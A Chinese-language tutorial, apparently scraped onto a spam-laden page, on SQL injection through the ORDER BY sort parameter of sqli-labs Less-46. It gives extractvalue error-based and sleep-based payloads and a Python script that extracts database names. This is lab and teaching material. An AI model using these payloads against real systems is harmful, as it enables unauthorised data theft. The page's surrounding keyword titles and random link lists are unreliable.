当前位置: 首页 > wzjs >正文

网站系统建设招标公告凡科网站制作教程

网站系统建设招标公告,凡科网站制作教程,网站logo设计免费版在线,哈尔滨精致网站建设实验描述 本实验基于sqli-lab的第46关进行测试 本关的sql 语句为$sql "SELECT * FROM users ORDER BY $id" 利用sort进行sql注入,我们可以利用报错注入,延时注入来爆出数据 1.报错注入 1.手工测试 爆出数据库 ?sort(extractvalue(1, c…

实验描述

本实验基于sqli-lab的第46关进行测试

本关的sql 语句为$sql = "SELECT * FROM users ORDER BY $id"

利用sort进行sql注入,我们可以利用报错注入,延时注入来爆出数据

1.报错注入

1.手工测试

爆出数据库

?sort=(extractvalue(1, concat(0x7e, (select schema_name from information_schema.schemata limit 1,1))))

爆出数据库中的表

?sort=(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1))))

 爆出表中的列

?sort=(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1))))

爆出列值

?sort=(extractvalue(1,concat(0x7e,(select username from users where id=1))))

2.代码实现

import requests
import re# 目标URL (根据实际环境修改)
target_url = "http://172.25.254.145/sqli-labs-php7-master/Less-46/"def extract_database_name():database_names = []index = 0while True:# 构造注入Payloadpayload = {"sort": f"(extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {index},1))))"}try:# 发送GET请求response = requests.get(target_url, params=payload, timeout=10)response.raise_for_status()# 正则匹配错误信息中的数据库名error_pattern = r"XPATH syntax error: '~([^']+)"match = re.search(error_pattern, response.text)if match:db_name = match.group(1)database_names.append(db_name)print(f"成功提取数据库名: {db_name}")index += 1else:if index == 0:print("找到数据库名,可能漏洞不存在或错误信息被隐藏")else:print("已提取所有数据库名")breakexcept requests.exceptions.Timeout:print(f"[-] 请求超时,索引为 {index},继续尝试...")except requests.exceptions.HTTPError as http_err:print(f"[-] HTTP请求错误,索引为 {index}: {http_err}")except requests.exceptions.RequestException as e:print(f"[-] 请求失败,索引为 {index}: {e}")return database_namesif __name__ == "__main__":all_database_names = extract_database_name()

结果

 同理,修改sql注入语句,即可爆出所有的数据信息

2.布尔盲注

错误按照username执行排序,否则结果正确

正确结果如下

错误结果如下

判断当前数据库的名称 

?sort=if((substr(database(),1,1)='s'),(select 1 from (select sleep(2)) as b),username)

判断第一个数据库的名称

?sort=if((ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105),(select 1 from (select sleep(2)) as b),username)

爆出数据库表(emali表)

?sort=if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),(select 1 from (select sleep(2)) as b),username)

爆出列值(USER)

?sort=if((ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=101),(select 1 from (select sleep(2)) as b),username)

 根据上述sql语句可以获得数据库的信息


文章转载自:

http://8ZFk9HWb.prjhc.cn
http://EiFcee13.prjhc.cn
http://5cGvWc4D.prjhc.cn
http://PopwvWwd.prjhc.cn
http://zIs0qxqm.prjhc.cn
http://O4k2agrj.prjhc.cn
http://tYk1RTUb.prjhc.cn
http://TlVS6BNS.prjhc.cn
http://MAHD0BM5.prjhc.cn
http://lG1u9hBr.prjhc.cn
http://x0gYy7QR.prjhc.cn
http://9ZbdofTo.prjhc.cn
http://Qcihbv6o.prjhc.cn
http://W5ItzYxR.prjhc.cn
http://nXgoSXCN.prjhc.cn
http://yjMr6Cd2.prjhc.cn
http://4A6cr6A8.prjhc.cn
http://Dpkef7Xk.prjhc.cn
http://MeKKwWD2.prjhc.cn
http://JNgq6Gn6.prjhc.cn
http://DS1Rh6Ar.prjhc.cn
http://iB1K5LAF.prjhc.cn
http://mW8ejyaN.prjhc.cn
http://iEe5Gbf1.prjhc.cn
http://vToxYS4t.prjhc.cn
http://aQ2sfAeL.prjhc.cn
http://6dc1q92P.prjhc.cn
http://152JqKFu.prjhc.cn
http://0UJmSCya.prjhc.cn
http://Uq6cNo6v.prjhc.cn
http://www.dtcms.com/wzjs/746337.html

相关文章:

  • 购物网站的开发wordpress 函数 chm
  • 如何推广网站方法威海seo网站推广
  • 杭州企业网站wordpress邮件验证码确认
  • sns网站建设哪家公司好厦门制作网页公司
  • 怎样创建网站app国家级建设网站
  • 电商网站开发的目的是住房城乡建设行业从业人员
  • 新手如何建网站搜索引擎优化平台
  • 北京诚通新新建设有限公司网站满亦工作室 网站建设
  • 雄安优秀网站建设方案佛山网站制作专家
  • 足球网站网站建设wordpress 函数调用
  • 同步wordpress站点网站商城前台模板
  • 济宁哪里做网站最便宜用ps做网站首页顶部图片
  • 如何找回网站后台密码服务佳的广州网站建设
  • 做商品条形码的网站济南外贸网站建设公司排名
  • 一家做运动鞋的网站好平罗门户网站建设
  • 如何写网站开发需求文档昆明网站制作代理
  • 海南网站建设报价银行网站源码
  • 德阳网站建设ghxhwl做一手房产中介用什么网站好
  • 怎么做加盟网站网页开发模板
  • 织梦网站后台打不开临沂做网站公司
  • 网站管理建设赣州企业网站建设公司
  • 营销型网站模板下载淮北建投网站
  • 自己做网站如何挣钱wordpress 引用来源
  • 网站静态页面关于网站开发的评审时间安排
  • 做网站好还是小程序好做机械外贸什么网站好
  • 嘉兴网站建设一薇收录优美图片topit
  • 酒泉市城乡建设局网站抖音app下载
  • 三五互联网站建设简述jsp网站开发的环境配置过程
  • 枣庄市网站建设百度不收录手机网站吗
  • 海南专业做网站的公司网站开发文档下载